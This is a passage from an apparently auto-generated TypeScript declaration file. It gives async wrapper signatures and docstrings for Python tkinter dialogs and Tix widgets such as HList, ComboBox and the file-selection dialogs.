\n\t\t\t * This method is called automatically to validate the data before the\n\t\t\t * dialog is destroyed. By default, it always validates OK.\n\t\t\t * \n\t\t\t */\n\t\t\tvalidate(): Promise<any>\n\t\t\tvalidate$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * process the data\n\t\t\t * \n\t\t\t * This method is called automatically to process the data, *after*\n\t\t\t * the dialog is destroyed. By default, it does nothing.\n\t\t\t * \n\t\t\t */\n\t\t\tapply(): Promise<any>\n\t\t\tapply$($: {}): Promise<any>\n\t\t}\n\t\tinterface I_QueryDialog extends IDialog {\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\t\t\tbody(master): Promise<any>\n\t\t\tbody$({ master }): Promise<any>\n\t\t\tvalidate(): Promise<any>\n\t\t\tvalidate$($: {}): Promise<any>\n\t\t}\n\t\tinterface I_QueryInteger extends I_QueryDialog {\n\t\t\tgetresult(): Promise<any>\n\t\t\tgetresult$($: {}): Promise<any>\n\t\t\terrormessage\n\t\t}\n\t\tinterface I_QueryFloat extends I_QueryDialog {\n\t\t\tgetresult(): Promise<any>\n\t\t\tgetresult$($: {}): Promise<any>\n\t\t}\n\t\tinterface I_QueryString extends I_QueryDialog {\n\t\t\tbody(master): Promise<any>\n\t\t\tbody$({ master }): Promise<any>\n\t\t\tgetresult(): Promise<any>\n\t\t\tgetresult$($: {}): Promise<any>\n\t\t}\n\t}\n\tmodule tix {\n\t\tvar _\n\n\t\t/**\n\t\t * Returns the qualified path name for the widget. Normally used to set\n\t\t * default options for subwidgets. See tixwidgets.py\n\t\t */\n\t\tfunction OptionName(widget): Promise<any>\n\t\tfunction OptionName$({ widget }): Promise<any>\n\t\tfunction FileTypeList(dict): Promise<any>\n\t\tfunction FileTypeList$({ dict }): Promise<any>\n\n\t\t/**\n\t\t * The tix commands provide access to miscellaneous elements\n\t\t * of Tix's internal state and the Tix application context.\n\t\t * Most of the information manipulated by these commands pertains\n\t\t * to the application as a whole, or to a screen or\n\t\t * display, rather than to a particular window.\n\t\t * \n\t\t * This is a mixin class, assumed to be mixed to Tkinter.Tk\n\t\t * that supports the self.tk.call method.\n\t\t * \n\t\t */\n\t\tinterface ItixCommand {\n\n\t\t\t/**\n\t\t\t * Tix maintains a list of directories under which\n\t\t\t * the tix_getimage and tix_getbitmap commands will\n\t\t\t * search for image files. The standard bitmap directory\n\t\t\t * is $TIX_LIBRARY/bitmaps. The addbitmapdir command\n\t\t\t * adds directory into this list. By using this\n\t\t\t * command, the image files of an applications can\n\t\t\t * also be located using the tix_getimage or tix_getbitmap\n\t\t\t * command.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_addbitmapdir(directory): Promise<any>\n\t\t\ttix_addbitmapdir$({ directory }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the current value of the configuration\n\t\t\t * option given by option. Option may be any of the\n\t\t\t * options described in the CONFIGURATION OPTIONS section.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_cget(option): Promise<any>\n\t\t\ttix_cget$({ option }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the configuration options of the Tix application\n\t\t\t * context. If no option is specified, returns a dictionary all of the\n\t\t\t * available options. If option is specified with no value, then the\n\t\t\t * command returns a list describing the one named option (this list\n\t\t\t * will be identical to the corresponding sublist of the value\n\t\t\t * returned if no option is specified). If one or more option-value\n\t\t\t * pairs are specified, then the command modifies the given option(s)\n\t\t\t * to have the given value(s); in this case the command returns an\n\t\t\t * empty string. Option may be any of the configuration options.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_configure(cnf?): Promise<any>\n\t\t\ttix_configure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the file selection dialog that may be shared among\n\t\t\t * different calls from this application. This command will create a\n\t\t\t * file selection dialog widget when it is called the first time. This\n\t\t\t * dialog will be returned by all subsequent calls to tix_filedialog.\n\t\t\t * An optional dlgclass parameter can be passed to specified what type\n\t\t\t * of file selection dialog widget is desired. Possible options are\n\t\t\t * tix FileSelectDialog or tixExFileSelectDialog.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_filedialog(dlgclass?): Promise<any>\n\t\t\ttix_filedialog$({ dlgclass }: { dlgclass?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Locates a bitmap file of the name name.xpm or name in one of the\n\t\t\t * bitmap directories (see the tix_addbitmapdir command above). By\n\t\t\t * using tix_getbitmap, you can avoid hard coding the pathnames of the\n\t\t\t * bitmap files in your application. When successful, it returns the\n\t\t\t * complete pathname of the bitmap file, prefixed with the character\n\t\t\t * '@'. The returned value can be used to configure the -bitmap\n\t\t\t * option of the TK and Tix widgets.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_getbitmap(name): Promise<any>\n\t\t\ttix_getbitmap$({ name }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Locates an image file of the name name.xpm, name.xbm or name.ppm\n\t\t\t * in one of the bitmap directories (see the addbitmapdir command\n\t\t\t * above). If more than one file with the same name (but different\n\t\t\t * extensions) exist, then the image type is chosen according to the\n\t\t\t * depth of the X display: xbm images are chosen on monochrome\n\t\t\t * displays and color images are chosen on color displays. By using\n\t\t\t * tix_ getimage, you can avoid hard coding the pathnames of the\n\t\t\t * image files in your application. When successful, this command\n\t\t\t * returns the name of the newly created image, which can be used to\n\t\t\t * configure the -image option of the Tk and Tix widgets.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_getimage(name): Promise<any>\n\t\t\ttix_getimage$({ name }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Gets the options maintained by the Tix\n\t\t\t * scheme mechanism. Available options include:\n\t\t\t * \n\t\t\t * active_bg active_fg bg\n\t\t\t * bold_font dark1_bg dark1_fg\n\t\t\t * dark2_bg dark2_fg disabled_fg\n\t\t\t * fg fixed_font font\n\t\t\t * inactive_bg inactive_fg input1_bg\n\t\t\t * input2_bg italic_font light1_bg\n\t\t\t * light1_fg light2_bg light2_fg\n\t\t\t * menu_font output1_bg output2_bg\n\t\t\t * select_bg select_fg selector\n\t\t\t * \n\t\t\t */\n\t\t\ttix_option_get(name): Promise<any>\n\t\t\ttix_option_get$({ name }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Resets the scheme and fontset of the Tix application to\n\t\t\t * newScheme and newFontSet, respectively. This affects only those\n\t\t\t * widgets created after this call. Therefore, it is best to call the\n\t\t\t * resetoptions command before the creation of any widgets in a Tix\n\t\t\t * application.\n\t\t\t * \n\t\t\t * The optional parameter newScmPrio can be given to reset the\n\t\t\t * priority level of the Tk options set by the Tix schemes.\n\t\t\t * \n\t\t\t * Because of the way Tk handles the X option database, after Tix has\n\t\t\t * been has imported and inited, it is not possible to reset the color\n\t\t\t * schemes and font sets using the tix config command. Instead, the\n\t\t\t * tix_resetoptions command must be used.\n\t\t\t * \n\t\t\t */\n\t\t\ttix_resetoptions(newScheme, newFontSet, newScmPrio?): Promise<any>\n\t\t\ttix_resetoptions$({ newScheme, newFontSet, newScmPrio }: { newScheme, newFontSet, newScmPrio?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Toplevel widget of Tix which represents mostly the main window\n\t\t * of an application. It has an associated Tcl interpreter.\n\t\t */\n\t\tfunction Tk(screenName?, baseName?, className?): Promise<ITk>\n\t\tfunction Tk$({ screenName, baseName, className }: { screenName?, baseName?, className?}): Promise<ITk>\n\t\tinterface ITk extends ItixCommand {\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * The Tix Form geometry manager\n\t\t * \n\t\t * Widgets can be arranged by specifying attachments to other widgets.\n\t\t * See Tix documentation for complete details\n\t\t */\n\t\tinterface IForm {\n\t\t\tconfig(cnf?): Promise<any>\n\t\t\tconfig$({ cnf }: { cnf?}): Promise<any>\n\t\t\tcheck(): Promise<any>\n\t\t\tcheck$($: {}): Promise<any>\n\t\t\tforget(): Promise<any>\n\t\t\tforget$($: {}): Promise<any>\n\t\t\tgrid(xsize?, ysize?): Promise<any>\n\t\t\tgrid$({ xsize, ysize }: { xsize?, ysize?}): Promise<any>\n\t\t\tinfo(option?): Promise<any>\n\t\t\tinfo$({ option }: { option?}): Promise<any>\n\t\t\tslaves(): Promise<any>\n\t\t\tslaves$($: {}): Promise<any>\n\t\t\tform\n\t\t}\n\n\t\t/**\n\t\t * A TixWidget class is used to package all (or most) Tix widgets.\n\t\t * \n\t\t * Widget initialization is extended in two ways:\n\t\t * 1) It is possible to give a list of options which must be part of\n\t\t * the creation command (so called Tix 'static' options). These cannot be\n\t\t * given as a 'config' command later.\n\t\t * 2) It is possible to give the name of an existing TK widget. These are\n\t\t * child widgets created automatically by a Tix mega-widget. The Tk call\n\t\t * to create these widgets is therefore bypassed in TixWidget.__init__\n\t\t * \n\t\t * Both options are for use by subclasses only.\n\t\t * \n\t\t */\n\t\tfunction TixWidget(master?, widgetName?, static_options?, cnf?, kw?): Promise<ITixWidget>\n\t\tfunction TixWidget$({ master, widgetName, static_options, cnf, kw }: { master?, widgetName?, static_options?, cnf?, kw?}): Promise<ITixWidget>\n\t\tinterface ITixWidget {\n\n\t\t\t/**\n\t\t\t * Set a variable without calling its action routine\n\t\t\t */\n\t\t\tset_silent(value): Promise<any>\n\t\t\tset_silent$({ value }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return the named subwidget (which must have been created by\n\t\t\t * the sub-class).\n\t\t\t */\n\t\t\tsubwidget(name): Promise<any>\n\t\t\tsubwidget$({ name }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return all subwidgets.\n\t\t\t */\n\t\t\tsubwidgets_all(): Promise<any>\n\t\t\tsubwidgets_all$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Set configuration options for all subwidgets (and self).\n\t\t\t */\n\t\t\tconfig_all(option, value): Promise<any>\n\t\t\tconfig_all$({ option, value }): Promise<any>\n\t\t\timage_create(imgtype, cnf?, master?): Promise<any>\n\t\t\timage_create$({ imgtype, cnf, master }: { imgtype, cnf?, master?}): Promise<any>\n\t\t\timage_delete(imgname): Promise<any>\n\t\t\timage_delete$({ imgname }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Subwidget class.\n\t\t * \n\t\t * This is used to mirror child widgets automatically created\n\t\t * by Tix/Tk as part of a mega-widget in Python (which is not informed\n\t\t * of this)\n\t\t */\n\t\tfunction TixSubWidget(master, name, destroy_physically?, check_intermediate?): Promise<ITixSubWidget>\n\t\tfunction TixSubWidget$({ master, name, destroy_physically, check_intermediate }: { master, name, destroy_physically?, check_intermediate?}): Promise<ITixSubWidget>\n\t\tinterface ITixSubWidget extends ITixWidget {\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * DisplayStyle - handle configuration options shared by\n\t\t * (multiple) Display Items\n\t\t */\n\t\tfunction DisplayStyle(itemtype, cnf?): Promise<IDisplayStyle>\n\t\tfunction DisplayStyle$({ itemtype, cnf }: { itemtype, cnf?}): Promise<IDisplayStyle>\n\t\tinterface IDisplayStyle {\n\t\t\tdelete(): Promise<any>\n\t\t\tdelete$($: {}): Promise<any>\n\t\t\tconfig(cnf?): Promise<any>\n\t\t\tconfig$({ cnf }: { cnf?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Balloon help widget.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * label Label\n\t\t * message Message\n\t\t */\n\t\tfunction Balloon(master?, cnf?): Promise<IBalloon>\n\t\tfunction Balloon$({ master, cnf }: { master?, cnf?}): Promise<IBalloon>\n\t\tinterface IBalloon extends ITixWidget {\n\n\t\t\t/**\n\t\t\t * Bind balloon widget to another.\n\t\t\t * One balloon widget may be bound to several widgets at the same time\n\t\t\t */\n\t\t\tbind_widget(widget, cnf?): Promise<any>\n\t\t\tbind_widget$({ widget, cnf }: { widget, cnf?}): Promise<any>\n\t\t\tunbind_widget(widget): Promise<any>\n\t\t\tunbind_widget$({ widget }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * ButtonBox - A container for pushbuttons.\n\t\t * Subwidgets are the buttons added with the add method.\n\t\t * \n\t\t */\n\t\tfunction ButtonBox(master?, cnf?): Promise<IButtonBox>\n\t\tfunction ButtonBox$({ master, cnf }: { master?, cnf?}): Promise<IButtonBox>\n\t\tinterface IButtonBox extends ITixWidget {\n\n\t\t\t/**\n\t\t\t * Add a button with given name to box.\n\t\t\t */\n\t\t\tadd(name, cnf?): Promise<any>\n\t\t\tadd$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tinvoke(name): Promise<any>\n\t\t\tinvoke$({ name }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * ComboBox - an Entry field with a dropdown menu. The user can select a\n\t\t * choice by either typing in the entry subwidget or selecting from the\n\t\t * listbox subwidget.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * entry Entry\n\t\t * arrow Button\n\t\t * slistbox ScrolledListBox\n\t\t * tick Button\n\t\t * cross Button : present if created with the fancy option\n\t\t */\n\t\tfunction ComboBox(master?, cnf?): Promise<IComboBox>\n\t\tfunction ComboBox$({ master, cnf }: { master?, cnf?}): Promise<IComboBox>\n\t\tinterface IComboBox extends ITixWidget {\n\t\t\tadd_history(str): Promise<any>\n\t\t\tadd_history$({ str }): Promise<any>\n\t\t\tappend_history(str): Promise<any>\n\t\t\tappend_history$({ str }): Promise<any>\n\t\t\tinsert(index, str): Promise<any>\n\t\t\tinsert$({ index, str }): Promise<any>\n\t\t\tpick(index): Promise<any>\n\t\t\tpick$({ index }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Control - An entry field with value change arrows. The user can\n\t\t * adjust the value by pressing the two arrow buttons or by entering\n\t\t * the value directly into the entry. The new value will be checked\n\t\t * against the user-defined upper and lower limits.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * incr Button\n\t\t * decr Button\n\t\t * entry Entry\n\t\t * label Label\n\t\t */\n\t\tfunction Control(master?, cnf?): Promise<IControl>\n\t\tfunction Control$({ master, cnf }: { master?, cnf?}): Promise<IControl>\n\t\tinterface IControl extends ITixWidget {\n\t\t\tdecrement(): Promise<any>\n\t\t\tdecrement$($: {}): Promise<any>\n\t\t\tincrement(): Promise<any>\n\t\t\tincrement$($: {}): Promise<any>\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t\tupdate(): Promise<any>\n\t\t\tupdate$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * DirList - displays a list view of a directory, its previous\n\t\t * directories and its sub-directories. The user can choose one of\n\t\t * the directories displayed in the list or change to another directory.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * hlist HList\n\t\t * hsb Scrollbar\n\t\t * vsb Scrollbar\n\t\t */\n\t\tfunction DirList(master, cnf?): Promise<IDirList>\n\t\tfunction DirList$({ master, cnf }: { master, cnf?}): Promise<IDirList>\n\t\tinterface IDirList extends ITixWidget {\n\t\t\tchdir(dir): Promise<any>\n\t\t\tchdir$({ dir }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * DirTree - Directory Listing in a hierarchical view.\n\t\t * Displays a tree view of a directory, its previous directories and its\n\t\t * sub-directories. The user can choose one of the directories displayed\n\t\t * in the list or change to another directory.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * hlist HList\n\t\t * hsb Scrollbar\n\t\t * vsb Scrollbar\n\t\t */\n\t\tfunction DirTree(master, cnf?): Promise<IDirTree>\n\t\tfunction DirTree$({ master, cnf }: { master, cnf?}): Promise<IDirTree>\n\t\tinterface IDirTree extends ITixWidget {\n\t\t\tchdir(dir): Promise<any>\n\t\t\tchdir$({ dir }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * DirSelectBox - Motif style file select box.\n\t\t * It is generally used for\n\t\t * the user to choose a file. FileSelectBox stores the files mostly\n\t\t * recently selected into a ComboBox widget so that they can be quickly\n\t\t * selected again.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * selection ComboBox\n\t\t * filter ComboBox\n\t\t * dirlist ScrolledListBox\n\t\t * filelist ScrolledListBox\n\t\t */\n\t\tfunction DirSelectBox(master, cnf?): Promise<IDirSelectBox>\n\t\tfunction DirSelectBox$({ master, cnf }: { master, cnf?}): Promise<IDirSelectBox>\n\t\tinterface IDirSelectBox extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * ExFileSelectBox - MS Windows style file select box.\n\t\t * It provides a convenient method for the user to select files.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * cancel Button\n\t\t * ok Button\n\t\t * hidden Checkbutton\n\t\t * types ComboBox\n\t\t * dir ComboBox\n\t\t * file ComboBox\n\t\t * dirlist ScrolledListBox\n\t\t * filelist ScrolledListBox\n\t\t */\n\t\tfunction ExFileSelectBox(master, cnf?): Promise<IExFileSelectBox>\n\t\tfunction ExFileSelectBox$({ master, cnf }: { master, cnf?}): Promise<IExFileSelectBox>\n\t\tinterface IExFileSelectBox extends ITixWidget {\n\t\t\tfilter(): Promise<any>\n\t\t\tfilter$($: {}): Promise<any>\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * The DirSelectDialog widget presents the directories in the file\n\t\t * system in a dialog window. The user can use this dialog window to\n\t\t * navigate through the file system to select the desired directory.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * dirbox DirSelectDialog\n\t\t */\n\t\tfunction DirSelectDialog(master, cnf?): Promise<IDirSelectDialog>\n\t\tfunction DirSelectDialog$({ master, cnf }: { master, cnf?}): Promise<IDirSelectDialog>\n\t\tinterface IDirSelectDialog extends ITixWidget {\n\t\t\tpopup(): Promise<any>\n\t\t\tpopup$($: {}): Promise<any>\n\t\t\tpopdown(): Promise<any>\n\t\t\tpopdown$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * ExFileSelectDialog - MS Windows style file select dialog.\n\t\t * It provides a convenient method for the user to select files.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * fsbox ExFileSelectBox\n\t\t */\n\t\tfunction ExFileSelectDialog(master, cnf?): Promise<IExFileSelectDialog>\n\t\tfunction ExFileSelectDialog$({ master, cnf }: { master, cnf?}): Promise<IExFileSelectDialog>\n\t\tinterface IExFileSelectDialog extends ITixWidget {\n\t\t\tpopup(): Promise<any>\n\t\t\tpopup$($: {}): Promise<any>\n\t\t\tpopdown(): Promise<any>\n\t\t\tpopdown$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * ExFileSelectBox - Motif style file select box.\n\t\t * It is generally used for\n\t\t * the user to choose a file. FileSelectBox stores the files mostly\n\t\t * recently selected into a ComboBox widget so that they can be quickly\n\t\t * selected again.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * selection ComboBox\n\t\t * filter ComboBox\n\t\t * dirlist ScrolledListBox\n\t\t * filelist ScrolledListBox\n\t\t */\n\t\tfunction FileSelectBox(master, cnf?): Promise<IFileSelectBox>\n\t\tfunction FileSelectBox$({ master, cnf }: { master, cnf?}): Promise<IFileSelectBox>\n\t\tinterface IFileSelectBox extends ITixWidget {\n\t\t\tapply_filter(): Promise<any>\n\t\t\tapply_filter$($: {}): Promise<any>\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * FileSelectDialog - Motif style file select dialog.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * btns StdButtonBox\n\t\t * fsbox FileSelectBox\n\t\t */\n\t\tfunction FileSelectDialog(master, cnf?): Promise<IFileSelectDialog>\n\t\tfunction FileSelectDialog$({ master, cnf }: { master, cnf?}): Promise<IFileSelectDialog>\n\t\tinterface IFileSelectDialog extends ITixWidget {\n\t\t\tpopup(): Promise<any>\n\t\t\tpopup$($: {}): Promise<any>\n\t\t\tpopdown(): Promise<any>\n\t\t\tpopdown$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * FileEntry - Entry field with button that invokes a FileSelectDialog.\n\t\t * The user can type in the filename manually. Alternatively, the user can\n\t\t * press the button widget that sits next to the entry, which will bring\n\t\t * up a file selection dialog.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * button Button\n\t\t * entry Entry\n\t\t */\n\t\tfunction FileEntry(master, cnf?): Promise<IFileEntry>\n\t\tfunction FileEntry$({ master, cnf }: { master, cnf?}): Promise<IFileEntry>\n\t\tinterface IFileEntry extends ITixWidget {\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t\tfile_dialog(): Promise<any>\n\t\t\tfile_dialog$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * HList - Hierarchy display widget can be used to display any data\n\t\t * that have a hierarchical structure, for example, file system directory\n\t\t * trees. The list entries are indented and connected by branch lines\n\t\t * according to their places in the hierarchy.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction HList(master?, cnf?): Promise<IHList>\n\t\tfunction HList$({ master, cnf }: { master?, cnf?}): Promise<IHList>\n\t\tinterface IHList extends ITixWidget {\n\t\t\tadd(entry, cnf?): Promise<any>\n\t\t\tadd$({ entry, cnf }: { entry, cnf?}): Promise<any>\n\t\t\tadd_child(parent?, cnf?): Promise<any>\n\t\t\tadd_child$({ parent, cnf }: { parent?, cnf?}): Promise<any>\n\t\t\tanchor_set(entry): Promise<any>\n\t\t\tanchor_set$({ entry }): Promise<any>\n\t\t\tanchor_clear(): Promise<any>\n\t\t\tanchor_clear$($: {}): Promise<any>\n\t\t\tcolumn_width(col?, width?, chars?): Promise<any>\n\t\t\tcolumn_width$({ col, width, chars }: { col?, width?, chars?}): Promise<any>\n\t\t\tdelete_all(): Promise<any>\n\t\t\tdelete_all$($: {}): Promise<any>\n\t\t\tdelete_entry(entry): Promise<any>\n\t\t\tdelete_entry$({ entry }): Promise<any>\n\t\t\tdelete_offsprings(entry): Promise<any>\n\t\t\tdelete_offsprings$({ entry }): Promise<any>\n\t\t\tdelete_siblings(entry): Promise<any>\n\t\t\tdelete_siblings$({ entry }): Promise<any>\n\t\t\tdragsite_set(index): Promise<any>\n\t\t\tdragsite_set$({ index }): Promise<any>\n\t\t\tdragsite_clear(): Promise<any>\n\t\t\tdragsite_clear$($: {}): Promise<any>\n\t\t\tdropsite_set(index): Promise<any>\n\t\t\tdropsite_set$({ index }): Promise<any>\n\t\t\tdropsite_clear(): Promise<any>\n\t\t\tdropsite_clear$($: {}): Promise<any>\n\t\t\theader_create(col, cnf?): Promise<any>\n\t\t\theader_create$({ col, cnf }: { col, cnf?}): Promise<any>\n\t\t\theader_configure(col, cnf?): Promise<any>\n\t\t\theader_configure$({ col, cnf }: { col, cnf?}): Promise<any>\n\t\t\theader_cget(col, opt): Promise<any>\n\t\t\theader_cget$({ col, opt }): Promise<any>\n\t\t\theader_exists(col): Promise<any>\n\t\t\theader_exists$({ col }): Promise<any>\n\t\t\theader_delete(col): Promise<any>\n\t\t\theader_delete$({ col }): Promise<any>\n\t\t\theader_size(col): Promise<any>\n\t\t\theader_size$({ col }): Promise<any>\n\t\t\thide_entry(entry): Promise<any>\n\t\t\thide_entry$({ entry }): Promise<any>\n\t\t\tindicator_create(entry, cnf?): Promise<any>\n\t\t\tindicator_create$({ entry, cnf }: { entry, cnf?}): Promise<any>\n\t\t\tindicator_configure(entry, cnf?): Promise<any>\n\t\t\tindicator_configure$({ entry, cnf }: { entry, cnf?}): Promise<any>\n\t\t\tindicator_cget(entry, opt): Promise<any>\n\t\t\tindicator_cget$({ entry, opt }): Promise<any>\n\t\t\tindicator_exists(entry): Promise<any>\n\t\t\tindicator_exists$({ entry }): Promise<any>\n\t\t\tindicator_delete(entry): Promise<any>\n\t\t\tindicator_delete$({ entry }): Promise<any>\n\t\t\tindicator_size(entry): Promise<any>\n\t\t\tindicator_size$({ entry }): Promise<any>\n\t\t\tinfo_anchor(): Promise<any>\n\t\t\tinfo_anchor$($: {}): Promise<any>\n\t\t\tinfo_bbox(entry): Promise<any>\n\t\t\tinfo_bbox$({ entry }): Promise<any>\n\t\t\tinfo_children(entry?): Promise<any>\n\t\t\tinfo_children$({ entry }: { entry?}): Promise<any>\n\t\t\tinfo_data(entry): Promise<any>\n\t\t\tinfo_data$({ entry }): Promise<any>\n\t\t\tinfo_dragsite(): Promise<any>\n\t\t\tinfo_dragsite$($: {}): Promise<any>\n\t\t\tinfo_dropsite(): Promise<any>\n\t\t\tinfo_dropsite$($: {}): Promise<any>\n\t\t\tinfo_exists(entry): Promise<any>\n\t\t\tinfo_exists$({ entry }): Promise<any>\n\t\t\tinfo_hidden(entry): Promise<any>\n\t\t\tinfo_hidden$({ entry }): Promise<any>\n\t\t\tinfo_next(entry): Promise<any>\n\t\t\tinfo_next$({ entry }): Promise<any>\n\t\t\tinfo_parent(entry): Promise<any>\n\t\t\tinfo_parent$({ entry }): Promise<any>\n\t\t\tinfo_prev(entry): Promise<any>\n\t\t\tinfo_prev$({ entry }): Promise<any>\n\t\t\tinfo_selection(): Promise<any>\n\t\t\tinfo_selection$($: {}): Promise<any>\n\t\t\titem_cget(entry, col, opt): Promise<any>\n\t\t\titem_cget$({ entry, col, opt }): Promise<any>\n\t\t\titem_configure(entry, col, cnf?): Promise<any>\n\t\t\titem_configure$({ entry, col, cnf }: { entry, col, cnf?}): Promise<any>\n\t\t\titem_create(entry, col, cnf?): Promise<any>\n\t\t\titem_create$({ entry, col, cnf }: { entry, col, cnf?}): Promise<any>\n\t\t\titem_exists(entry, col): Promise<any>\n\t\t\titem_exists$({ entry, col }): Promise<any>\n\t\t\titem_delete(entry, col): Promise<any>\n\t\t\titem_delete$({ entry, col }): Promise<any>\n\t\t\tentrycget(entry, opt): Promise<any>\n\t\t\tentrycget$({ entry, opt }): Promise<any>\n\t\t\tentryconfigure(entry, cnf?): Promise<any>\n\t\t\tentryconfigure$({ entry, cnf }: { entry, cnf?}): Promise<any>\n\t\t\tnearest(y): Promise<any>\n\t\t\tnearest$({ y }): Promise<any>\n\t\t\tsee(entry): Promise<any>\n\t\t\tsee$({ entry }): Promise<any>\n\t\t\tselection_clear(cnf?): Promise<any>\n\t\t\tselection_clear$({ cnf }: { cnf?}): Promise<any>\n\t\t\tselection_includes(entry): Promise<any>\n\t\t\tselection_includes$({ entry }): Promise<any>\n\t\t\tselection_set(first, last?): Promise<any>\n\t\t\tselection_set$({ first, last }: { first, last?}): Promise<any>\n\t\t\tshow_entry(entry): Promise<any>\n\t\t\tshow_entry$({ entry }): Promise<any>\n\t\t\theader_exist\n\t\t}\n\n\t\t/**\n\t\t * InputOnly - Invisible widget. Unix only.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction InputOnly(master?, cnf?): Promise<IInputOnly>\n\t\tfunction InputOnly$({ master, cnf }: { master?, cnf?}): Promise<IInputOnly>\n\t\tinterface IInputOnly extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * LabelEntry - Entry field with label. Packages an entry widget\n\t\t * and a label into one mega widget. It can be used to simplify the creation\n\t\t * of ``entry-form'' type of interface.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * label Label\n\t\t * entry Entry\n\t\t */\n\t\tfunction LabelEntry(master?, cnf?): Promise<ILabelEntry>\n\t\tfunction LabelEntry$({ master, cnf }: { master?, cnf?}): Promise<ILabelEntry>\n\t\tinterface ILabelEntry extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * LabelFrame - Labelled Frame container. Packages a frame widget\n\t\t * and a label into one mega widget. To create widgets inside a\n\t\t * LabelFrame widget, one creates the new widgets relative to the\n\t\t * frame subwidget and manage them inside the frame subwidget.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * label Label\n\t\t * frame Frame\n\t\t */\n\t\tfunction LabelFrame(master?, cnf?): Promise<ILabelFrame>\n\t\tfunction LabelFrame$({ master, cnf }: { master?, cnf?}): Promise<ILabelFrame>\n\t\tinterface ILabelFrame extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * A ListNoteBook widget is very similar to the TixNoteBook widget:\n\t\t * it can be used to display many windows in a limited space using a\n\t\t * notebook metaphor. The notebook is divided into a stack of pages\n\t\t * (windows). At one time only one of these pages can be shown.\n\t\t * The user can navigate through these pages by\n\t\t * choosing the name of the desired page in the hlist subwidget.\n\t\t */\n\t\tfunction ListNoteBook(master, cnf?): Promise<IListNoteBook>\n\t\tfunction ListNoteBook$({ master, cnf }: { master, cnf?}): Promise<IListNoteBook>\n\t\tinterface IListNoteBook extends ITixWidget {\n\t\t\tadd(name, cnf?): Promise<any>\n\t\t\tadd$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tpage(name): Promise<any>\n\t\t\tpage$({ name }): Promise<any>\n\t\t\tpages(): Promise<any>\n\t\t\tpages$($: {}): Promise<any>\n\t\t\traise_page(name): Promise<any>\n\t\t\traise_page$({ name }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * The Meter widget can be used to show the progress of a background\n\t\t * job which may take a long time to execute.\n\t\t * \n\t\t */\n\t\tfunction Meter(master?, cnf?): Promise<IMeter>\n\t\tfunction Meter$({ master, cnf }: { master?, cnf?}): Promise<IMeter>\n\t\tinterface IMeter extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * NoteBook - Multi-page container widget (tabbed notebook metaphor).\n\t\t * 